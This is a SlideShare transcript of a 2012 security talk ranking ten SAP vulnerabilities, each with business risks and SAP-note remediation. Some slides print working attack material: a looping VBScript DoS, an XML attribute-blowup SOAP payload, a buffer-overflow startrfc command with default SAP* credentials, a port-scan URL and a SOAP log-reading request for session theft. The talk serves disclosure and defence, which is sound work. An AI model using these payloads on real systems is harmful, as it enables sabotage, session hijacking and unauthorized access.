Invest in securityto secure investmentsSAP (In)Security: New and BestAlexander PolyakovCTO at ERPScan/Digital SecurityMay ...
MeBusiness application  security expert
Instead of IntroVulnerabilities are everywhere
What is SAP ?Shut upAndPay
Really• The most popular business application• More than 120000 customers• 74% of Forbes 500
Agenda•   Intro•   SAP security history•   SAP on the Internet•   Most popular SAP issues (OLD)•   Top 10 latest interesti...
3 areas of SAP Security2002       Business logic security       Prevents attacks or mistakes made by       insiders       ...
Talks about SAP security3530          Most popular:            • BlackHat25          • HITB            • Troopers20       ...
SAP Security notes900800700600500             By April 26, 2012, a total of 2026 notes400300200100  0      2001     2002  ...
SAP vulnerabilities by type                             1 - Directory Traversal2 - XSS/Unauthorised modification of stored...
Top problems by OWASP-EAS (Implementation issues)EASAI-1 Lack of patch managementEASAI-2 Default Passwords for application...
Top problems by BIZEC● BIZEC TEC-01: Vulnerable Software in Use● BIZEC TEC-02: Standard Users with Default Passwords● BIZE...
Business RisksEspionage• Stealing financial information• Stealing corporate secrets• Stealing suppliers and customers list...
SAP on the Internet          MYTH: SAP systems attacks available only for insiders• We have collected data about SAP syste...
SAP on the Internet
SAP on the InternetAbout 5000 systems including Dispatcher, Message server,SapHostcontrol, Web- services
Top 10 vulnerabilities 2011-20121. Authentication Bypass via Verb tampering2. Authentication Bypass via the Invoker servle...
10 – GUI-Scripting DOS: Description                                                                       New• SAP users c...
10 – GUI-scripting: DetailsIf Not IsObject(application) Then   Set SapGuiAuto = GetObject("SAPGUI")   Set application = Sa...
10 – GUI-scripting: Other attacks Script can be uploaded using:     – SAPGUI ActiveX vulnerability     – Teensy USB flash ...
10 – GUI-scripting: Business risksSabotage – HighEspionage – NoFraud – No                  Ease of exploitation – Medium
10 – GUI-scripting: Prevention• SAP GUI Scripting Security Guide• sapgui/user_scripting = FALSE• Block registry modificati...
9 – XML Blowup DOS: Description                                                                            New•   WEBRFC i...
9 – XML Blowup DOS: Details<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"   xmlns:SOAP-ENC=...
9 – XML Blowup DOS: Business risksSabotage – CriticalEspionage – NoFraud – No                 Ease of exploitation – Medium
9 – XML Blowup DOS: Prevention• Disable WEBRFC• Prevent unauthorized access to WEBRFC using S_ICF• Install SAP notes 15433...
8 – BAPI script injection/hash stealing : Description• SAP BAPI transaction fails to properly sanitize input• Possible to ...
8 – BAPI script injection/hash stealing: Demo                                                New
8 – BAPI script injection/hash stealing: Business risksEspionage – HighSabotage – HighFraud – High                   Ease ...
7 – SAP GUI bad encryption: Description                                                                         New•   SAP...
7 – SAP GUI bad encryption: Demo
7 – SAP GUI bad encryption: Business risksEspionage – HighSabotage – MediumFraud – High                   Ease of exploita...
7 – SAP GUI bad encryption: Prevention• Disable password storage in GUI
6 – Remote port scan via JSP: Description•   It is possible to scan internal network from the Internet•   Authentication i...
6 – Remote port scan via JSP: DemoHost is not alive            HTTP portPort closed                   SAP port
6 – Remote port scan via JSP: Business risksSabotage – LowEspionage – MediumFraud – No             Ease of exploitation – ...
6 – Remote port scan via JSP: Prevention• Install SAP notes:               1548548, 1545883, 1503856, 948851, 1545883• Dis...
5 – MMC JSESSIONID stealing: Description                                                                      New• Remote ...
5 – MMC SESSIONID stealing: Details<?xml version="1.0" encoding="UTF-8" ?><SOAP-ENV:Envelope             xmlns:SOAP-ENV="h...
5 – MMC JSESSIONID stealing: Business risksEspionage – CriticalFraud – HighSabotage – Medium               Ease of exploit...
5 – MMC JSESSIONID stealing: Prevention•    The JSESSIONID by default will not be logged in log file• Don’t use TRACE_LEVE...
4 – Remote command execution in TH_GREP: Description•   RCE vulnerability in RFC module TH_GREP•   Found by Joris van de V...
4 – RCE in TH_GREP: Detailselseif opsys = Windows NT.concatenate /c:" string " filename into grep_params in character mode...
4 – RCE in TH_GREP: Demo #1
4 - RCE in TH_GREP: More details4 ways to execute vulnerable program•   Using transaction "Se37“•   Using transaction “SM5...
4 – RCE in TH_GREP: Demo #2
4 – RCE in TH_GREP: Business risksEspionage – HighSabotage – MediumFraud – High                   Ease of exploitation – m...
4 – RFC in TH_GREP: Prevention• Install SAP notes 1580017, 1433101• Prevent access to critical transactions and RFC functi...
3 - ABAP Kernel BOF: Description• Presented by Andreas Wiegenstein at BlackHat EU 2011• Buffer overflow in SAP kernel func...
3 -ABAP Kernel BOF: Details> startrfc.exe -3 -h 172.16.0.63 -s 01 -c 000 –u SAP* -p 11111 -F    RSPO_R_SAPGPARAM -E    NAM...
3 – ABAP Kernel BOF: Business risksEspionage – CriticalSabotage – CriticalFraud – Critical             Ease of exploitatio...
3 – ABAP Kernel BOF: Prevention• Install SAP notes:- 1493516 – Correcting buffer overflow in ABAP system call- 1487330 – P...
2 – Invoker Servlet: Description• Rapidly calls servlets by their class name• Published by SAP in their security guides• P...
2 - Invoker Servlet: Details<servlet> <servlet-name>CriticalAction</servlet-name> <servlet-class>com.sap.admin.Critical.Ac...
2 – Invoker servlet: Business risksEspionage – HighSabotage – HighFraud – High          Ease of use – Very easy!
2 - Invoker servlet: Prevention•   Update to the latest patch 1467771, 1445998•   “EnableInvokerServletGlobally” property ...
1 – VERB Tampering
1st Place – Verb Tampering<security-constraint><web-resource-collection><web-resource-name>Restrictedaccess</web-resource-...
1st Place – Verb tampering: Details• CTC – Secret interface for managing J2EE engine• Can be accessed remotely• Can run us...
1 – Verb tampering: Demo
1 – Verb tampering: More detailsIf patched, can be bypassed by the Invoker servlet!
1 – Verb tampering: Business risksEspionage – CriticalSabotage – CriticalFraud – Critical           Ease of use – Very easy!
1st Place – Verb tampering: PreventionPrevention:• Install SAP notes 1503579,1616259• Install other SAP notes about Verb T...
ConclusionIt is possible to be protected from almost all those kinds of issues and we are     working hard with SAP to mak...
Future work  Many of the researched things cannot be  disclosed now because of our good relationship  with SAP Security Re...
Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, PavelKuzmin, Evgeniy Neelov.
web:    www.dsec.ru        www.erpscan.come-mail: info@erpscan.comsales@erpscan.comTwitter: @erpscan         @sh2kerr
Upcoming SlideShare
Loading in …5
×

SAP (In)Security: New and Best

1,585 views

Published on

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,585
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
67
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

SAP (In)Security: New and Best

  1. 1. Invest in securityto secure investmentsSAP (In)Security: New and BestAlexander PolyakovCTO at ERPScan/Digital SecurityMay 31, 2012
  2. 2. MeBusiness application security expert
  3. 3. Instead of IntroVulnerabilities are everywhere
  4. 4. What is SAP ?Shut upAndPay
  5. 5. Really• The most popular business application• More than 120000 customers• 74% of Forbes 500
  6. 6. Agenda• Intro• SAP security history• SAP on the Internet• Most popular SAP issues (OLD)• Top 10 latest interesting attacks (NEW)• DEMOs• Conclusion
  7. 7. 3 areas of SAP Security2002 Business logic security Prevents attacks or mistakes made by insiders Solution: GRC2008 ABAP Code security Prevents attacks or mistakes made by developers Solution: Code audit2010 Application platform security Prevents unauthorized access both within the corporate network and from remote attackers Solution?
  8. 8. Talks about SAP security3530 Most popular: • BlackHat25 • HITB • Troopers20 • RSA • Source15 • DeepSec • etc.10 5 0 2006 2007 2008 2009 2010 2011 2012
  9. 9. SAP Security notes900800700600500 By April 26, 2012, a total of 2026 notes400300200100 0 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012
  10. 10. SAP vulnerabilities by type 1 - Directory Traversal2 - XSS/Unauthorised modification of stored content 3 - Missing Auth check 4 - Information Disclosure 5 - Unauthorized usage of application functionality 6 - Hard-coded credentials 7 - Code injection vulnerability 8 - Verb tampering Stats from : 9 - Remote Code Execution • 1Q 2012 • 1Q 2010 10 - Denial of service • 4Q 2009 11 - BOF 12 -SQL Inj 0 50 100 150 200 250 300 350
  11. 11. Top problems by OWASP-EAS (Implementation issues)EASAI-1 Lack of patch managementEASAI-2 Default Passwords for application accessEASAI-3 SOD conflictsEASAI-4 Unnecessary Enabled Application featuresEASAI-5 Open Remote management interfacesEASAI-6 lack of password lockout/complexity checksEASAI-7 Insecure optionsEASAI-8 Unencrypted communicationsEASAI-9 Insecure trust relationsEASAI-10 Guest access
  12. 12. Top problems by BIZEC● BIZEC TEC-01: Vulnerable Software in Use● BIZEC TEC-02: Standard Users with Default Passwords● BIZEC TEC-03: Unsecured SAP Gateway● BIZEC TEC-04: Unsecured SAP/Oracle authentication● BIZEC TEC-05: Insecure RFC interfaces● BIZEC TEC-06: Insufficient Security Audit Logging● BIZEC TEC-07: Unsecured SAP Message Server● BIZEC TEC-08: Dangerous SAP Web Applications● BIZEC TEC-09: Unprotected Access to Administration Services● BIZEC TEC-10: Insecure Network Environment● BIZEC TEC-11: Unencrypted Communications
  13. 13. Business RisksEspionage• Stealing financial information• Stealing corporate secrets• Stealing suppliers and customers list• Stealing HR dataSabotage• Denial of service• Modification of financial reports• Access to technology network (SCADA) by trust relationsFraud• False transactions• Modification of master data• e.t.c.
  14. 14. SAP on the Internet MYTH: SAP systems attacks available only for insiders• We have collected data about SAP systems in the WEB• Have various stats by countries, applications, versions• Information from Google, Shodan, Nmap scan
  15. 15. SAP on the Internet
  16. 16. SAP on the InternetAbout 5000 systems including Dispatcher, Message server,SapHostcontrol, Web- services
  17. 17. Top 10 vulnerabilities 2011-20121. Authentication Bypass via Verb tampering2. Authentication Bypass via the Invoker servlet3. Buffer overflow in ABAP Kernel4. Code execution via TH_GREP N5. MMC read SESSIONID N6. Remote portscan Nw7. Encryption in SAPGUI N N w8. BAPI XSS/SMBRELAY N N N Nw9. XML Blowup DOS w N10. GUI Scripting DOS w
  18. 18. 10 – GUI-Scripting DOS: Description New• SAP users can run scripts which automate their user functions• A script has the same rights in SAP as the user who launched it• Security message which is shown to user can be turned off in the registry• Almost any user can use SAP Messages (SM02 transaction)• It is possible to run DOS attack on any user using a simple script Author: Dmitry Chastukhin (ERPScan)
  19. 19. 10 – GUI-scripting: DetailsIf Not IsObject(application) Then Set SapGuiAuto = GetObject("SAPGUI") Set application = SapGuiAuto.GetScriptingEngineEnd IfIf Not IsObject(connection) Then Set connection = application.Children(0)End IfIf Not IsObject(session) Then Set session = connection.Children(0)End IfIf IsObject(WScript) Then WScript.ConnectObject session, "on" WScript.ConnectObject application, "on"End Ifdoa=a+1session.findById("wnd[0]").maximizesession.findById("wnd[0]/tbar[0]/okcd").text = "/nsm02"session.findById("wnd[0]/tbar[0]/btn[0]").presssession.findById("wnd[0]/tbar[1]/btn[34]").presssession.findById("wnd[1]/usr/txtEMLINE1").text = "hello"session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocussession.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocussession.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0session.findById("wnd[1]").sendVKey 4session.findById("wnd[2]/usr/lbl[1,3]").setFocussession.findById("wnd[2]/usr/lbl[1,3]").caretPosition = 15session.findById("wnd[2]").sendVKey 2session.findById("wnd[1]/usr/ctxtTEMSG-CLIENT").text = "800"session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").text = "en"session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").setFocussession.findById("wnd[1]/usr/ctxtTEMSG-LANGU").caretPosition = 2session.findById("wnd[1]/tbar[0]/btn[0]").pressLoop Until a>=1000
  20. 20. 10 – GUI-scripting: Other attacks Script can be uploaded using: – SAPGUI ActiveX vulnerability – Teensy USB flash – Any other method of client exploitationOther attacks like changing banking accounts in LFBK also possible
  21. 21. 10 – GUI-scripting: Business risksSabotage – HighEspionage – NoFraud – No Ease of exploitation – Medium
  22. 22. 10 – GUI-scripting: Prevention• SAP GUI Scripting Security Guide• sapgui/user_scripting = FALSE• Block registry modification on workstations
  23. 23. 9 – XML Blowup DOS: Description New• WEBRFC interface can be used to run RFC functions• By default any user can have access• Can execute at least RFC_PING• SAP NetWeaver is vulnerable to malformed XML packets• It is possible to run DOS attack on server using simple script• It is possible to run over the Internet! Author: Alexey Tyurin (ERPScan)
  24. 24. 9 – XML Blowup DOS: Details<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><SOAP-ENV:Body><m:RFC_PING xmlns:m="urn:sap-com:document:sap:rfc:functions" a1="" a2="" ... a10000="" ></m:RFC_PING></SOAP-ENV:Body></SOAP-ENV:Envelope>
  25. 25. 9 – XML Blowup DOS: Business risksSabotage – CriticalEspionage – NoFraud – No Ease of exploitation – Medium
  26. 26. 9 – XML Blowup DOS: Prevention• Disable WEBRFC• Prevent unauthorized access to WEBRFC using S_ICF• Install SAP notes 1543318 and 1469549
  27. 27. 8 – BAPI script injection/hash stealing : Description• SAP BAPI transaction fails to properly sanitize input• Possible to inject JavaScript code or link to a fake SMB server• SAP GUI clients use Windows so their credentials will be transferred to attackers host. Author: Dmitry Chastukhin (ERPScan)
  28. 28. 8 – BAPI script injection/hash stealing: Demo New
  29. 29. 8 – BAPI script injection/hash stealing: Business risksEspionage – HighSabotage – HighFraud – High Ease of exploitation – Low
  30. 30. 7 – SAP GUI bad encryption: Description New• SAP FrontEnd can save encrypted passwords in shortcuts• Shortcuts stored in .sap file• This password uses byte-XOR algorithm with “secret” key• Key has the same value for every installation of SAP GUI• Any password can be decrypted in 1 second Author: Alexey Sintsov (ERPScan)
  31. 31. 7 – SAP GUI bad encryption: Demo
  32. 32. 7 – SAP GUI bad encryption: Business risksEspionage – HighSabotage – MediumFraud – High Ease of exploitation – Medium
  33. 33. 7 – SAP GUI bad encryption: Prevention• Disable password storage in GUI
  34. 34. 6 – Remote port scan via JSP: Description• It is possible to scan internal network from the Internet• Authentication is not required• SAP NetWeaver J2EE engine is vulnerable/ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13& port=31337& password=& dispatcher=& targetClient=& view= Author: Alexander Polyakov (ERPScan)
  35. 35. 6 – Remote port scan via JSP: DemoHost is not alive HTTP portPort closed SAP port
  36. 36. 6 – Remote port scan via JSP: Business risksSabotage – LowEspionage – MediumFraud – No Ease of exploitation – High
  37. 37. 6 – Remote port scan via JSP: Prevention• Install SAP notes: 1548548, 1545883, 1503856, 948851, 1545883• Disable unnecessary applications
  38. 38. 5 – MMC JSESSIONID stealing: Description New• Remote management of SAP Platform• By default, many commands go without auth• Exploits implemented in Metasploit (by ChrisJohnRiley)• Most of the bugs are information disclosure• It is possible to find information about JSESSIONID• Only if trace is ON 1) Original bug by ChrisJohnRiley 2) JSESSIONID by Alexey Sintsov and Alexey Tyurin (ERPScan) Can be authenticated as an existing user remotely
  39. 39. 5 – MMC SESSIONID stealing: Details<?xml version="1.0" encoding="UTF-8" ?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess = "http://www.sap.com/webas/630/soap/features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:ReadLogFile xmlns:ns1="urn:SAPControl"> <filename>j2ee/cluster/server0/log/system/userinterface.log</filename> <filter></filter> <language></language> <maxentries>100</maxentries> <statecookie>EOF</statecookie> </ns1:ReadLogFile> </SOAP-ENV:Body></SOAP-ENV:Envelope>
  40. 40. 5 – MMC JSESSIONID stealing: Business risksEspionage – CriticalFraud – HighSabotage – Medium Ease of exploitation – Medium
  41. 41. 5 – MMC JSESSIONID stealing: Prevention• The JSESSIONID by default will not be logged in log file• Don’t use TRACE_LEVEL = 3 on production systems or delete traces after use• Other infohttp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
  42. 42. 4 – Remote command execution in TH_GREP: Description• RCE vulnerability in RFC module TH_GREP• Found by Joris van de Vis• SAP was not properly patched (1433101)• We have discovered that the patch can be bypassed in Windows Original bug by Joris van de Vis (erp-sec) Bypass by Alexey Tyurin (ERPScan)
  43. 43. 4 – RCE in TH_GREP: Detailselseif opsys = Windows NT.concatenate /c:" string " filename into grep_params in character mode.else. /*if linux*/ /* 185 */ replace all occurrences of in local_string with "". /* 186 */ concatenate local_string filename into grep_params /* 187*/ in character mode. /* 188*/ endif./* 188*/
  44. 44. 4 – RCE in TH_GREP: Demo #1
  45. 45. 4 - RCE in TH_GREP: More details4 ways to execute vulnerable program• Using transaction "Se37“• Using transaction “SM51“ (thanks to Felix Granados)• Using remote RFC call "TH_GREP"• Using SOAP RFC call "TH_GREP" via web
  46. 46. 4 – RCE in TH_GREP: Demo #2
  47. 47. 4 – RCE in TH_GREP: Business risksEspionage – HighSabotage – MediumFraud – High Ease of exploitation – medium
  48. 48. 4 – RFC in TH_GREP: Prevention• Install SAP notes 1580017, 1433101• Prevent access to critical transactions and RFC functions• Check the ABAP code of your Z-transactions for similarvulnerabilities
  49. 49. 3 - ABAP Kernel BOF: Description• Presented by Andreas Wiegenstein at BlackHat EU 2011• Buffer overflow in SAP kernel function C_SAPGPARAM• When NAME field is more than 108 chars• Can be exploited by calling an FM which uses C_SAPGPARAM• Example of report – RSPO_R_SAPGPARAM Author: (VirtualForge)
  50. 50. 3 -ABAP Kernel BOF: Details> startrfc.exe -3 -h 172.16.0.63 -s 01 -c 000 –u SAP* -p 11111 -F RSPO_R_SAPGPARAM -E NAME=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA -t 4RFC Call/Exception: SYSTEM_FAILUREGroup Error group 104Key RFC_ERROR_SYSTEM_FAILUREMessage connection closed without message (CM_NO_DATA_RECEIVED)
  51. 51. 3 – ABAP Kernel BOF: Business risksEspionage – CriticalSabotage – CriticalFraud – Critical Ease of exploitation – Medium
  52. 52. 3 – ABAP Kernel BOF: Prevention• Install SAP notes:- 1493516 – Correcting buffer overflow in ABAP system call- 1487330 – Potential remote code execution in SAP Kernel• Prevent access to critical transactions and RFC functions• Check the ABAP code of your Z-transactions for critical calls
  53. 53. 2 – Invoker Servlet: Description• Rapidly calls servlets by their class name• Published by SAP in their security guides• Possible to call any servlet from the application• Even if it is not declared in WEB.XML Can be used for auth bypass
  54. 54. 2 - Invoker Servlet: Details<servlet> <servlet-name>CriticalAction</servlet-name> <servlet-class>com.sap.admin.Critical.Action</servlet-class></servlet><servlet-mapping> <servlet-name>CriticalAction</</servlet-name> <url-pattern>/admin/critical</url-pattern></servlet-mapping<security-constraint><web-resource-collection><web-resource-name>Restrictedaccess</web-resource-name><url-pattern>/admin/*</url-pattern><http-method>GET</http-method></web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint></security-constraint> Author: Dmitry Chastukhin (ERPScan)What if we call /servlet/com.sap.admin.Critical.Action
  55. 55. 2 – Invoker servlet: Business risksEspionage – HighSabotage – HighFraud – High Ease of use – Very easy!
  56. 56. 2 - Invoker servlet: Prevention• Update to the latest patch 1467771, 1445998• “EnableInvokerServletGlobally” property of the servlet_jsp must be “false”If you can’t install patches for some reason, you can check all WEB.XML filesusing ERPScan web.xml scanner manually.
  57. 57. 1 – VERB Tampering
  58. 58. 1st Place – Verb Tampering<security-constraint><web-resource-collection><web-resource-name>Restrictedaccess</web-resource-name><url-pattern>/admin/*</url-pattern><http-method>GET</http-method></web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint></security-constraint> Author: Alexander Polyakov (ERPScan) What if we use HEAD instead of GET ?
  59. 59. 1st Place – Verb tampering: Details• CTC – Secret interface for managing J2EE engine• Can be accessed remotely• Can run user management actions: – Add users – Add to groups – Run OS commands – Start/Stop J2EE Remotely without authentication!
  60. 60. 1 – Verb tampering: Demo
  61. 61. 1 – Verb tampering: More detailsIf patched, can be bypassed by the Invoker servlet!
  62. 62. 1 – Verb tampering: Business risksEspionage – CriticalSabotage – CriticalFraud – Critical Ease of use – Very easy!
  63. 63. 1st Place – Verb tampering: PreventionPrevention:• Install SAP notes 1503579,1616259• Install other SAP notes about Verb Tampering (about 18)• Scan applications using ERPScan WEB.XML check tool or manually• Secure WEB.XML by deleting all <http-method>• Disable the applications that are not necessary
  64. 64. ConclusionIt is possible to be protected from almost all those kinds of issues and we are working hard with SAP to make it secure SAP Guides Regular Security assessments Monitoring technical security ABAP Code review Segregation of Duties It’s all in your hands
  65. 65. Future work Many of the researched things cannot be disclosed now because of our good relationship with SAP Security Response Team, whom I would like to thank for cooperation. However, if you want to see new demos and 0-days, follow us at @erpscan and attend the future presentations:• Just4Meeting in July (Portugal)• BlackHat USA in July (Las Vegas)
  66. 66. Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, PavelKuzmin, Evgeniy Neelov.
  67. 67. web: www.dsec.ru www.erpscan.come-mail: info@erpscan.comsales@erpscan.comTwitter: @erpscan @sh2kerr

×